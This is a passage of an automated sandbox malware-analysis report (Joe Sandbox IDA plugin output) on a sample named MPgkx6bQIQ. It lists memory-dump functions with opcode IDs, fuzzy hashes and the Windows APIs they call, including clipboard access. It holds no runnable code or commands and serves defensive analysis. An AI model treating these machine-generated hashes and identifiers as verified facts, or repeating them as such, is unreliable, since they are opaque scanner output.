                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                          • Instruction ID: 34064763689ac3de6fc2931be55773beff4606bcf56ef1d504eadd77b2d196bf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E01F272A306008FDF21EF20C905BBF33E5FB86306F0550A6D90A97381E370A8498B80
                                                                                                                                                                                                                                                                                          Function 024A70E4 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                                          • Instruction ID: e8084dc5e7dfcc4d519ce80bab3f29eab8306755998803453d0699d00f7e5f29
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF06DB5E0C3848BC718DF28C45063AFBE5AB9A700F10A93ED48AA3341DB31D545CB4A
                                                                                                                                                                                                                                                                                          Function 024A7797 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                                                          • Instruction ID: 105713abdaea2eefd27ce6dba229579eaed4e6cae262987884b2b04d67898584
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAF069B410D3919FC300DF29D29051BFFE0ABD5318F64EA5CE8DA5B212D334C5028B4A
                                                                                                                                                                                                                                                                                          Function 024A54D1 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                                                          • Instruction ID: 54f6791b19feaab174315a8068ce3548ef6630c58af0954641ad5995dfcb3488
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CF0EDB1A88301BAF6258A01CC43F6BB6B89B55B04F301519B344790E0E5E1B5498B1E
                                                                                                                                                                                                                                                                                          Function 0042526A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                                          • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                                                                                                                                                                                          Function 024BAD19 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                          • Instruction ID: 3f0327492912c326d74bc6b1bae2584806e2ff85f78facd436f9c1379979bcc7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94F0A735B457808BEB04CF38E82199BBBE6E787228F145A7DD641D3751DB39C4018605
                                                                                                                                                                                                                                                                                          Function 0043AAB2 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                          • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                                                                                                                                                                                          Function 024A63B6 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                                          • Instruction ID: 80fbaeeab38f874a1026c3ded23ccaa1ef9bb188e1373d2453640531e5596f5f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2D02E2480C63AC20E2A0E1401301BEA72A0A23505B0F59E6DCE1BF282CBE2C80B4358
                                                                                                                                                                                                                                                                                          Function 024BC268 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                                          • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                                                          Function 024BC79B Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                                          • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                                                                          Function 024A559D Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                                          • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                                                                          Function 024B1337 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                                          • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                                          • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                                          • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                                          • Instruction ID: f53a5e1f8ee9b91d7136638630b9b731faa22d6d69be784595d1073ad77bd381
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49419F7051C7818ED301AF78999836FBEE09F86314F084A7EE8D986392D6788549C7A3
                                                                                                                                                                                                                                                                                          Function 024AFAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                          • String ID: L
                                                                                                                                                                                                                                                                                          • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                                          • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                                          • Instruction ID: 8b67c78340b8fb1ad4e063d2d18872e235bfd1e7b5bd58e0c5bd348bd25d5f3e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D41497110CBC18ED321DB38845865EBFE1ABE6220F188A9DE1F5873E2D675854ACB53
                                                                                                                                                                                                                                                                                          Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                          • String ID: L
                                                                                                                                                                                                                                                                                          • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                                          • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                                          • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                                                                          Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                                          • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                                          • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86
                                                                                                                                                                                                                                                                                          Function 0040B9D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                          • String ID: Wu
                                                                                                                                                                                                                                                                                          • API String ID: 3664257935-4083010176
                                                                                                                                                                                                                                                                                          • Opcode ID: 8501977874cf33a4c46fa7807dbe23817083d533ce9f3e4674829aa3b3398596
                                                                                                                                                                                                                                                                                          • Instruction ID: 58510d58c826e4dda8c4a846b9b6f57f468079e8869e8656342225e30f6071e8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8501977874cf33a4c46fa7807dbe23817083d533ce9f3e4674829aa3b3398596
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03C002B98089009BDF416FB5FE0A8293EA5EB4670670201F4FC0951433DB3A0926EB99